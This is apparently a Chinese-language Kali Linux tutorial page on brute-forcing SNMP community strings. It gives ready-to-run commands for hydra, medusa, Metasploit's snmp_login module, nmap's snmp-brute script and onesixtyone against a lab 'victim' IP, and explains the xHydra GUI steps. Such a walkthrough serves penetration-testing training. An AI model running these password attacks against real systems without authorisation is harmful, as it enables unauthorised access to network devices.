搜索
Kali笔记 门户 图文快讯 查看内容

在线破解SNMP密码的多种方法

2018-4-4 19:01| 发布者: admin| 查看: 3290| 评论: 0

摘要: Hydrahydra是经常选择的使用工具。它可以对超过50种协议执行快速字典攻击,包括telnet,ftp,http,https,smb,多个数据库等等。运行以下命令hydra-P/root/Desktop/pass.txt192.168.1.125snmp-P:表示密码列表的路 ...

Hydra

hydra是经常选择的使用工具。它可以对超过50种协议执行快速字典攻击,包括telnet,ftp,http,https,smb,多个数据库等等。

运行以下命令

  1. hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp 

-P:表示密码列表的路径

一旦命令执行完毕,它就会开始应用字典攻击,所以你很快就会拥有正确的用户名和密码。正如你所看到的,我们已经成功地将SNMP密码作为ignite123来获取。

xHydra

xHydra是Hydra的图形化版本

在你的kali中打开xHydra。并选择单个目标选项,并给出您的受害者PC的IP。然后选择SNMP in Protocol对Protocol选项,并将端口号161设置为端口选项

现在,转到密码选项,并在用户名部分选中协议旁边的框,不需要用户名。然后选择密码列表并在与其相邻的框中输入包含所有密码的文本文件的路径

现在转到特定的选项卡并在SNMP中清除写在SNMP下面的文本框中的数据,如给出的屏幕截图所示

完成后,转到开始选项卡,然后单击左侧的开始按钮。现在,攻击将开始。因此,您将获得受害者的密码。正如你所看到的,密码为ignite123。

medusa

medusa是一个快速、大规模并行、模块化蛮力攻击工具。它支持许多协议:AFP,CVS,FTP,HTTP,IMAP,rlogin,SSH,SNMP和VNC等等

运行以下命令

  1. medusa -M snmp -h 192.168.1.125 -u ignite -P /root/Desktop/pass.txt 

这里

  • -h:表示主机IP
  • -u:表示特定的用户

但暴力强制SNMP不需要用户名,但美杜莎没有正确的语法不能工作,你可以使用你选择的任何用户名

  • – P:表示密码列表的路径

正如你所看到的,我们已经成功地将SNMP密码作为ignite123来获取。

Metasploit

该模块将测试一系列机器上的SNMP登录并报告成功登录。如果您已加载数据库插件并连接到数据库,则此模块将记录成功的登录和主机,以便您可以跟踪访问。

在kali打开msfconsole

现在输入use auxiliary/scanner/snmp/snmp_login

  1. msf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125(远程主机的IP地址) 
  2. msf auxiliary(scanner/snmp/snmp_login)> set pass_file /root/Desktop/pass.txt 
  3. msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true 
  4. msf auxiliary(scanner/snmp/snmp_login)> run 

从下面的图片你可以看到我们已经成功地获得了SNMP密码。

NMAP

我们也可以使用nmap破解snmp密码,执行下面的命令。

  1. nmap -sU -p 161 -n -script snmp-brute 192.168.1.125 -script-args snmp-brute.communitiesdb = / root / Desktop / pass.txt 

正如您在上面看到的,我们将密码破解为ignite123。

Onesixtyone

Onesixtyone是一个专门针对于SNMP协议的扫描器

  1. onesixtyone 192.168.1.125 -c /root/Desktop/pass.txt 

路过

雷人

握手

鲜花

鸡蛋
上一篇:ssh破解思路下一篇:Msfconsole使用总结

相关分类

下级分类

返回顶部